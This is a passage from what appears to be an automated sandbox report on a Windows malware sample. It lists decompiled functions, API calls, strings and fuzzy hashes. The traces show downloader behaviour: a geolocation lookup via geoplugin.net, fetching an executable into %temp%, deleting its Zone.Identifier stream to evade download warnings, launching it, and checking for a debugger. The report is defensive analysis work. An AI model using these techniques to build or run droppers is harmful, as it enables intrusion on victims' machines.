                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$Open$CloseHandle
                                                                                                                                                                                                                                                    • String ID: "geoplugin_countryCode":"$MSIE$http://www.geoplugin.net/json.gp?ip=
                                                                                                                                                                                                                                                    • API String ID: 3289985339-822378312
                                                                                                                                                                                                                                                    • Opcode ID: 3402f3501ce7ac14db07859145295f463229a74523a88d0279d332a561d49035
                                                                                                                                                                                                                                                    • Instruction ID: c0fb3bbf10c088a46a3af774b9efa6f740bb6698fc17ef525d962f92a792e7ed
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3402f3501ce7ac14db07859145295f463229a74523a88d0279d332a561d49035
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13715570D082D8EBDB25DBA5CD95BDDB7B5BB48740F008198E189AB281DBB06EC5CF50

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 52 9e10b0-9e10fb ExpandEnvironmentStringsW wsprintfW 54 9e10fd-9e10ff 52->54 55 9e1103-9e112c CreateFileW 52->55 56 9e113d-9e1140 54->56 57 9e112e-9e1135 CloseHandle 55->57 58 9e113b 55->58 57->58 58->56
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 009E10CA
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 009E10E3
                                                                                                                                                                                                                                                    • PathFileExistsW.KERNELBASE(?), ref: 009E10F3
                                                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 009E1119
                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(000000FF), ref: 009E1135
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
                                                                                                                                                                                                                                                    • String ID: %s\faeeeeeeeaef.txt$%temp%$^Gv
                                                                                                                                                                                                                                                    • API String ID: 750032643-3839393303
                                                                                                                                                                                                                                                    • Opcode ID: 040faf96f159bd6c70ab97a5d61509c14d677f820e75fa5e62353dd685297821
                                                                                                                                                                                                                                                    • Instruction ID: a4905c66cb1d7e6795554f8f691c37d49fc15033c137e8770809feee0d10c74b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 040faf96f159bd6c70ab97a5d61509c14d677f820e75fa5e62353dd685297821
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C01A7F0948358ABDB30DB60DC8EFE5733CAB44705F0046D4A755A50D2D6B05EC69FA5

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 009E164B
                                                                                                                                                                                                                                                      • Part of subcall function 009E10B0: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 009E10CA
                                                                                                                                                                                                                                                      • Part of subcall function 009E10B0: wsprintfW.USER32 ref: 009E10E3
                                                                                                                                                                                                                                                      • Part of subcall function 009E10B0: PathFileExistsW.KERNELBASE(?), ref: 009E10F3
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 009E1661
                                                                                                                                                                                                                                                      • Part of subcall function 009E28BA: __getptd.LIBCMT ref: 009E28BF
                                                                                                                                                                                                                                                      • Part of subcall function 009E1380: InternetOpenA.WININET(MSIE,00000001,00000000,00000000,00000000), ref: 009E13B9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CountEnvironmentExistsExpandFileInternetOpenPathSleepStringsTick__getptdwsprintf
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 69823509-0
                                                                                                                                                                                                                                                    • Opcode ID: b06e871909ae18c2c4bd5887a0fd225800bde4bd8b644c79cc96b301feb8242a
                                                                                                                                                                                                                                                    • Instruction ID: f20d2dd05f92d914672f74fb4d21368dcccbf7b0888ec89a7e07eff7e9dbe271
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b06e871909ae18c2c4bd5887a0fd225800bde4bd8b644c79cc96b301feb8242a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF2186B1D102889BCF06EFE2EC51AEE73B8BF44745F104529F40166242EF75AD09CB61

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 90 9e8592-9e85b4 HeapCreate 91 9e85b8-9e85c1 90->91 92 9e85b6-9e85b7 90->92
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 009E85A7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 10892065-0
                                                                                                                                                                                                                                                    • Opcode ID: f74a8fc0c812317bbd4b60117dd61c2831de8b9920c14178a5cb2ea3958e46b6
                                                                                                                                                                                                                                                    • Instruction ID: a1112248fe13a8b242978ef8421a24fef95f525d38b8c20e205db166512ad601
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f74a8fc0c812317bbd4b60117dd61c2831de8b9920c14178a5cb2ea3958e46b6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C3D05E729A83899EEB009FB26C08B323BDC9384396F408435F81CC6191F9B0C980EA00

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 009E88FD
                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009E8912
                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(009ECDA4), ref: 009E891D
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 009E8939
                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 009E8940
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2579439406-0
                                                                                                                                                                                                                                                    • Opcode ID: 4fc54b3279a513d453b7586827ba6677383d196b644edd1565d069302b00c611
                                                                                                                                                                                                                                                    • Instruction ID: 36735410de7884c5882e01fe8edbbbf5f9fe3652bc57063d64784ea107649105
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4fc54b3279a513d453b7586827ba6677383d196b644edd1565d069302b00c611
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A2100B5829344DFCB41DF26EC866683BECBB88309F50402AE64897272E7B05981EF05

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 009E1159
                                                                                                                                                                                                                                                      • Part of subcall function 009E28BA: __getptd.LIBCMT ref: 009E28BF
                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 009E1180
                                                                                                                                                                                                                                                    • _strlen.LIBCMT ref: 009E118A
                                                                                                                                                                                                                                                    • _mbstowcs.LIBCMT ref: 009E11A1
                                                                                                                                                                                                                                                      • Part of subcall function 009E2B16: __mbstowcs_l_helper.LIBCMT ref: 009E2B36
                                                                                                                                                                                                                                                    • _rand.LIBCMT ref: 009E11A9
                                                                                                                                                                                                                                                      • Part of subcall function 009E28CC: __getptd.LIBCMT ref: 009E28CC
                                                                                                                                                                                                                                                    • _rand.LIBCMT ref: 009E11BD
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 009E11E4
                                                                                                                                                                                                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 009E11FA
                                                                                                                                                                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,jjj,00000000), ref: 009E1229
                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 009E1258
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000103,?), ref: 009E128B
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 009E12BC
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 009E12CB
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 009E12E4
                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 009E12F4
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 009E1310
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 009E131D
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 009E132A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • %s:Zone.Identifier, xrefs: 009E12D8
                                                                                                                                                                                                                                                    • %s\%d%d.exe, xrefs: 009E11D8
                                                                                                                                                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36, xrefs: 009E11F5
                                                                                                                                                                                                                                                    • jjj, xrefs: 009E1215
                                                                                                                                                                                                                                                    • %temp%, xrefs: 009E117B
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$CloseFileHandle$Open__getptd_randwsprintf$CountCreateDeleteEnvironmentExpandReadStringsTickWrite__mbstowcs_l_helper_mbstowcs_strlen
                                                                                                                                                                                                                                                    • String ID: %s:Zone.Identifier$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36$jjj
                                                                                                                                                                                                                                                    • API String ID: 95124798-2602374422
                                                                                                                                                                                                                                                    • Opcode ID: 13bbf062875f778e66ef77c2de9db16c3cc00115fdf1705602c94ffc09b48f34
                                                                                                                                                                                                                                                    • Instruction ID: 70795b4b832bd2ff32fda3cb2a6688ddc2e9e60f75769e42a7386c05691c800e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 13bbf062875f778e66ef77c2de9db16c3cc00115fdf1705602c94ffc09b48f34
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B41F5F1904358ABEB24DB60CC8AFEA737DAB8C701F040098F649A61D1DA749E81CF60

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,009EE3F0,0000000C,009E5145,00000000,00000000,?,?,009E5172,?,009E28C4,?,009E1165,00000000), ref: 009E501C
                                                                                                                                                                                                                                                    • __crt_waiting_on_module_handle.LIBCMT ref: 009E5027
                                                                                                                                                                                                                                                      • Part of subcall function 009E78F5: Sleep.KERNEL32(000003E8,00000000,?,009E4F6C,KERNEL32.DLL,?,009E4FB8,?,009E5108,?,?,009E5172,?,009E28C4,?,009E1165), ref: 009E7901
                                                                                                                                                                                                                                                      • Part of subcall function 009E78F5: GetModuleHandleW.KERNEL32(009E1165,?,009E4F6C,KERNEL32.DLL,?,009E4FB8,?,009E5108,?,?,009E5172,?,009E28C4,?,009E1165,00000000), ref: 009E790A
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 009E5050
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,DecodePointer), ref: 009E5060
                                                                                                                                                                                                                                                    • __lock.LIBCMT ref: 009E5082
                                                                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(52000003), ref: 009E508F
                                                                                                                                                                                                                                                    • __lock.LIBCMT ref: 009E50A3
                                                                                                                                                                                                                                                    • ___addlocaleref.LIBCMT ref: 009E50C1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                                                                                                                                                                    • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                                                                                                                                                    • API String ID: 1028249917-2843748187
                                                                                                                                                                                                                                                    • Opcode ID: 7302300a6e8d9436a55309743446521aaa051bc634678aba6c2cf9872f84c421
                                                                                                                                                                                                                                                    • Instruction ID: d19951d2cdc473416aab90d32f23559235bf92f315159c0cf46bb9aa25d3b9c4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7302300a6e8d9436a55309743446521aaa051bc634678aba6c2cf9872f84c421
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3711D2B1401B81EAD722EF7BC845B5ABBE0AF84718F10442EF49996291CB709E02CF54

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 206 9e1000-9e1060 call 9e2840 * 2 CreateProcessW 211 9e1062-9e106f Sleep 206->211 212 9e1071-9e1095 ShellExecuteW 206->212 213 9e10a8-9e10ab 211->213 214 9e10a6 212->214 215 9e1097-9e10a4 Sleep 212->215 214->213 215->213
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 009E100E
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 009E101E
                                                                                                                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 009E1057
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 009E1067
                                                                                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 009E1082
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 009E109C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Sleep_memset$CreateExecuteProcessShell
                                                                                                                                                                                                                                                    • String ID: $D$open
                                                                                                                                                                                                                                                    • API String ID: 2725567952-2182757814
                                                                                                                                                                                                                                                    • Opcode ID: 5913c81c0299d511dde629a4228b0d631b72cf81dd44cddefe09fb72cb2638d3
                                                                                                                                                                                                                                                    • Instruction ID: 14397e7809ebcc82a6a61ffc02425cc42d6348837178c76fb16bc2058638eab8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5913c81c0299d511dde629a4228b0d631b72cf81dd44cddefe09fb72cb2638d3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F1191B0A84348FBEB21DF90CC47F9E7378AB54B02F100115F6086E2C1D6B15E409755

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __CreateFrameInfo.LIBCMT ref: 009E63BA
                                                                                                                                                                                                                                                      • Part of subcall function 009E2F39: __getptd.LIBCMT ref: 009E2F47
                                                                                                                                                                                                                                                      • Part of subcall function 009E2F39: __getptd.LIBCMT ref: 009E2F55
                                                                                                                                                                                                                                                    • __getptd.LIBCMT ref: 009E63C4
                                                                                                                                                                                                                                                      • Part of subcall function 009E516A: __getptd_noexit.LIBCMT ref: 009E516D
                                                                                                                                                                                                                                                      • Part of subcall function 009E516A: __amsg_exit.LIBCMT ref: 009E517A
                                                                                                                                                                                                                                                    • __getptd.LIBCMT ref: 009E63D2
                                                                                                                                                                                                                                                    • __getptd.LIBCMT ref: 009E63E0
                                                                                                                                                                                                                                                    • __getptd.LIBCMT ref: 009E63EB
                                                                                                                                                                                                                                                    • _CallCatchBlock2.LIBCMT ref: 009E6411
                                                                                                                                                                                                                                                      • Part of subcall function 009E2FDE: __CallSettingFrame@12.LIBCMT ref: 009E302A
                                                                                                                                                                                                                                                      • Part of subcall function 009E64B8: __getptd.LIBCMT ref: 009E64C7
                                                                                                                                                                                                                                                      • Part of subcall function 009E64B8: __getptd.LIBCMT ref: 009E64D5
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1602911419-0
                                                                                                                                                                                                                                                    • Opcode ID: 3ef9f4e3736ae9b85b702889c11eabdb075bb0ca9e82017c6cdd19eba45f9bc1
                                                                                                                                                                                                                                                    • Instruction ID: b4080414e46629530ce5f862e371e6e16f3223936d8cb5fec7f03b0e9ce82a42
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ef9f4e3736ae9b85b702889c11eabdb075bb0ca9e82017c6cdd19eba45f9bc1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C11C3B1C04249DFDB01EFA5C846BAE7BB0FF48314F158469F814A7291EB789A119F50

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 236 9e60e1-9e60f2 237 9e610c-9e6118 call 9e516a 236->237 238 9e60f4-9e60f9 236->238 240 9e6126-9e6129 237->240 245 9e611a-9e6124 call 9e516a 237->245 239 9e60fb-9e6100 call 9e516a 238->239 238->240 239->237 245->240
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __getptd.LIBCMT ref: 009E60FB
                                                                                                                                                                                                                                                      • Part of subcall function 009E516A: __getptd_noexit.LIBCMT ref: 009E516D
                                                                                                                                                                                                                                                      • Part of subcall function 009E516A: __amsg_exit.LIBCMT ref: 009E517A
                                                                                                                                                                                                                                                    • __getptd.LIBCMT ref: 009E610C
                                                                                                                                                                                                                                                    • __getptd.LIBCMT ref: 009E611A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                                                                    • String ID: MOC$csm
                                                                                                                                                                                                                                                    • API String ID: 803148776-1389381023
                                                                                                                                                                                                                                                    • Opcode ID: 22d66bda3bd0e28a62dd5cc331779b80c5982ea97763823264e9b4db7458a40c
                                                                                                                                                                                                                                                    • Instruction ID: 05af6e82ba2071838f66ff9f0852242e07ae0abe5385e8745e48ce221cc87ac5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 22d66bda3bd0e28a62dd5cc331779b80c5982ea97763823264e9b4db7458a40c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AAE08631508284CFC712AB66C146B2937A8FB99358F1A05B1E54CC7263C774DC409582

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 258 9e5666-9e5681 call 9e85c4 call 9e516a 263 9e5683-9e5687 258->263 264 9e56a0-9e56b8 call 9e8ac4 258->264 263->264 265 9e5689 263->265 269 9e56ba-9e56bc 264->269 270 9e56f0-9e56fc call 9e5701 264->270 267 9e568c-9e568e 265->267 271 9e5698-9e569f call 9e8609 267->271 272 9e5690-9e5697 call 9e7925 267->272 273 9e56be-9e56c7 InterlockedDecrement 269->273 274 9e56d8-9e56ea InterlockedIncrement 269->274 270->267 272->271 273->274 278 9e56c9-9e56cf 273->278 274->270 278->274 282 9e56d1-9e56d7 call 9e6dcc 278->282 282->274
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __getptd.LIBCMT ref: 009E5672
                                                                                                                                                                                                                                                      • Part of subcall function 009E516A: __getptd_noexit.LIBCMT ref: 009E516D
                                                                                                                                                                                                                                                      • Part of subcall function 009E516A: __amsg_exit.LIBCMT ref: 009E517A
                                                                                                                                                                                                                                                    • __amsg_exit.LIBCMT ref: 009E5692
                                                                                                                                                                                                                                                    • __lock.LIBCMT ref: 009E56A2
                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 009E56BF
                                                                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(02A42C68), ref: 009E56EA
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
